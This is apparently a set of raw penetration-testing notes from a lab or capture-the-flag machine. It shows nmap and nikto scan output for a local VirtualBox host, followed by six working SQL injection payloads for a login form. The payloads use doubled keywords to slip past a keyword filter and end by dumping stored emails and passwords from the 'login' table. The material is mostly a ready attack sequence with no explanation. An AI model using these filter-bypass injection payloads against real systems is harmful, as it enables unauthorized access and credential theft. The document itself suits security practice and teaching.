Nmap scan report for 192.168.56.3 Host is up (0.00083s latency).
PORT STATE SERVICE VERSION 22/tcp filtered ssh 80/tcp open http Apache httpd 2.2.22 ((Debian)) |_http-server-header: Apache/2.2.22 (Debian) |_http-title: Site doesn't have a title (text/html). 3128/tcp open http-proxy Squid http proxy 3.1.20 |_http-server-header: squid/3.1.20 |_http-title: ERROR: The requested URL could not be retrieved MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16 Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 37.12 seconds
nikto -h http://192.168.56.3 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.56.3 + Target Hostname: 192.168.56.3 + Target Port: 80 + Start Time: 2020-07-12 12:44:05 (GMT8) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Debian) + Server leaks inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 19:23:36 2014 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9 + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3233: /icons/README: Apache default file found. + /login.php: Admin login page/section found. + 8346 requests: 0 error(s) and 11 item(s) reported on remote host + End Time: 2020-07-12 12:44:36 (GMT8) (31 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
email=' union ALL sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect 2)b JOIN (sselectelect 3)c) # &password=1
email=' union ALL sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect version())b JOIN (sselectelect 3)c) # &password=1
email=' union ALL sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect database())b JOIN (sselectelect 3)c) # &password=1
email=' union sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect group_concat(table_name) from infoorrmation_schema.tables where table_schema like 'SkyTech' )b JOIN (sselectelect 3)c) # &password=1
email=' union sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect group_concat(column_name) from infoorrmation_schema.columns where table_schema like 'SkyTech' aandnd table_name like 'login')b JOIN (sselectelect 3)c) # &password=1
email=' union sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect group_concat(email) from login)b JOIN (sselectelect group_concat(passwoorrd) from login)c) # &password=1